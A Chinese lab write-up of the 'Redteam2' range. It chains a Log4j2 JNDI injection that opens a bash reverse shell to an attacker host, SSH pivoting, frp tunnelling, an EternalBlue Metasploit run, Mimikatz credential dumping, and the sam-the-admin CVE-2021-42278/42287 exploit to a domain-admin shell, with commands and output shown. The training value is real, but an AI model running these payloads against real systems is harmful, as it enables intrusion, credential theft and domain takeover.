Redteam2靶场攻略(从外网 log4j2 RCE 再到内网核弹组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC)

Redteam2靶场攻略(从外网 log4j2 RCE 再到内网核弹组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC)

环境启动

参考文章https://mp.weixin.qq.com/s/UAeOtOwigsB45hcjYEGh9g

本靶场由3台虚拟机构成

在这里插入图片描述

主机网卡ip地址角色
docker -log4j2ens33外网网卡(桥接)/ens38内网网卡192.168.210.39/10.0.1.6webserver
win7本地连接1/本地连接210.0.1.7/10.0.0.7域内个人主机
win2012r2本地连接110.0.0.12域控DC

信息收集

nmap扫描

┌──(root💀kali)-[~]
└─# nmap -A 192.168.210.39 -p-     

在这里插入图片描述

发现ssh服务开放22端口 ,38080端口是http服务

在这里插入图片描述

漏洞利用

log4j2漏洞复现

本地kali搭建ldap服务器

工具链接https://github.com/zzwlpx/JNDIExploit

在这里插入图片描述

BP抓包,改为post传参并且构造payload

/bin/bash -i >& /dev/tcp/192.168.210.23/9999 0>&1  -反弹shell

payload=${jndi:ldap://192.168.210.23:1389/TomcatBypass/Command/Base64/L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjEwLjIzLzk5OTkgMD4mMQ==}

在这里插入图片描述

反弹shell命令需要进行base64编码

在这里插入图片描述

同时kali监听9999的端口,成功getshell
在这里插入图片描述

虽然拿到了root但是发现此刻我们在docker内

cat /proc/1/cgroup

在这里插入图片描述

在root家目录下发现flag1

在这里插入图片描述

根据flag1的提示我们得到了saul Saul123 这非常像一组账密

在信息收集中nmap扫到目标主机开放22ssh服务,因此思路可转向ssh

是否能够进行docker逃逸等后续研究

ssh登录

ssh成功登录目标主机
在这里插入图片描述

内网信息收集

通过信息收集发现本台主机共有两块网卡

ens33:192.168.210.39 (外网网卡)

ens38:10.0.1.6 (内网网卡)

在这里插入图片描述

内网主机探活

法一、

我们用 for 循环 ping 一下 ens38C 段:

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done

在这里插入图片描述

发现存活主机10.0.1.7

法二、

或者使用 scan info 工具进行内网信息收集

kali中使用python快速搭建httpd

在这里插入图片描述

靶机下载工具并赋予权限

在这里插入图片描述

进行内网信息收集

在这里插入图片描述

发现10.0.1.7存活并存在MS17-010

流量代理

由于目标10.0.1.7在内网需要把流量代理出来

kali使用python快速搭建httpd

python3 -m http.server 8888

在这里插入图片描述

目标靶机下载frp

使用frp把目标靶机流量代理出来

kali端 frps

在这里插入图片描述

靶机端 frpc

在这里插入图片描述

漏洞利用MS17-010

拿到win7shell

msf设置Socks


msf6 > setg Proxies socks5:127.0.0.1:6005      ------设置socks5代理
Proxies => socks5:127.0.0.1:6005
msf6 > set ReverseAllowProxy true               -----允许反向代理
ReverseAllowProxy => true
msf6 >  use auxiliary/scanner/smb/smb_ms17_010  --辅助检测模块检测ms17-010


在这里插入图片描述

发现存在ms17-010

攻击设置

msf6 auxiliary(scanner/smb/smb_version) > search MS17-010

.....

msf6 auxiliary(scanner/smb/smb_version) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.1.7    
rhosts => 10.0.1.7
msf6 exploit(windows/smb/ms17_010_eternalblue) >  set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp              
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit 

注意由于目标在内网,故而tcp反射连接不能使用  设置为payload正向bind_tcp!

在这里插入图片描述

抓取内存密码,信息收集

加载猕猴桃 Mimikatz 先把密码抓出来:

meterpreter > load mimikatz  加载工具

meterpreter > creds_all      列出凭证  
注意命令是从内存中抓取密码,靶场原始状态为暂停恢复即可,如果重启过需要登录一次win7

在这里插入图片描述


C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>cd /Users/root/desktop
cd /Users/root/desktop

C:\Users\root\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9227-12B7

 Directory of C:\Users\root\Desktop

2021/12/20  17:32    <DIR>          .
2021/12/20  17:32    <DIR>          ..
2021/12/20  17:33                19 flag.txt
               1 File(s)             19 bytes
               2 Dir(s)  30,754,717,696 bytes free

C:\Users\root\Desktop>type flag.txt
type flag.txt
flag{redteam.lab-2}

在桌面上发现第二个flag

在这里插入图片描述

ipconfig 发现第三层网络

在这里插入图片描述

net user /domain 
ping dc

在这里插入图片描述

得到dc的ip为10.0.0.12

内网渗透之大杀器 - CVE-2021-42287、CVE-2021-42278

Microsoft Windows Active Directory 域服务权限提升漏洞(CVE-2021-42278、CVE-2021-42287)攻击者可利用该漏洞将域内的普通用户权限提升到域管理员权限,造成风险和危害极大。

流量代理

meterpreter > background 
[*] Backgrounding session 1...    
后台运行session

代理模块添加socks5代理

在这里插入图片描述

配置路由

在这里插入图片描述

注意更改本地代理配置与msf中设置对应

vim /etc/proxychains4.conf

在这里插入图片描述

使用漏洞利用脚本

下载:https://github.com/WazeHell/sam-the-admin

注意此脚本需要一个域用户的账户+密码

──(root💀kali)-[~/tools/exp漏洞利用/CVE-2021-42287+CVE-2021-42278/sam-the-admin-main]
└─# proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:389  ...  OK
[-] WARNING: Target host is not a DC
[*] Selected Target dc.redteam.lab
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Current ms-DS-MachineAccountQuota = 10
[*] Adding Computer Account "SAMTHEADMIN-12$"
[*] MachineAccount "SAMTHEADMIN-12$" password = MQtyQic2&zvb
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:445  ...  OK
[*] Successfully added machine account SAMTHEADMIN-12$ with password MQtyQic2&zvb.
[*] SAMTHEADMIN-12$ object = CN=SAMTHEADMIN-12,CN=Computers,DC=redteam,DC=lab
[*] SAMTHEADMIN-12$ sAMAccountName == dc
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:88  ...  OK
[*] Saving ticket in dc.ccache
[*] Resting the machine account to SAMTHEADMIN-12$
[*] Restored SAMTHEADMIN-12$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*]     Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:88  ...  OK
[*] Saving ticket in Administrator.ccache
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>cd \Users\administrator\Desktop
[-] You can't CD under SMBEXEC. Use full paths.
C:\Windows\system32>type \Users\administrator\Desktop\flag.txt
flag{redteam.lab-3}

Congratulations, the challenge is successful!

by: saulGoodman

在这里插入图片描述

桌面上拿到flag3,通关!

flag{redteam.lab-3}

在这里插入图片描述

  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 12
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值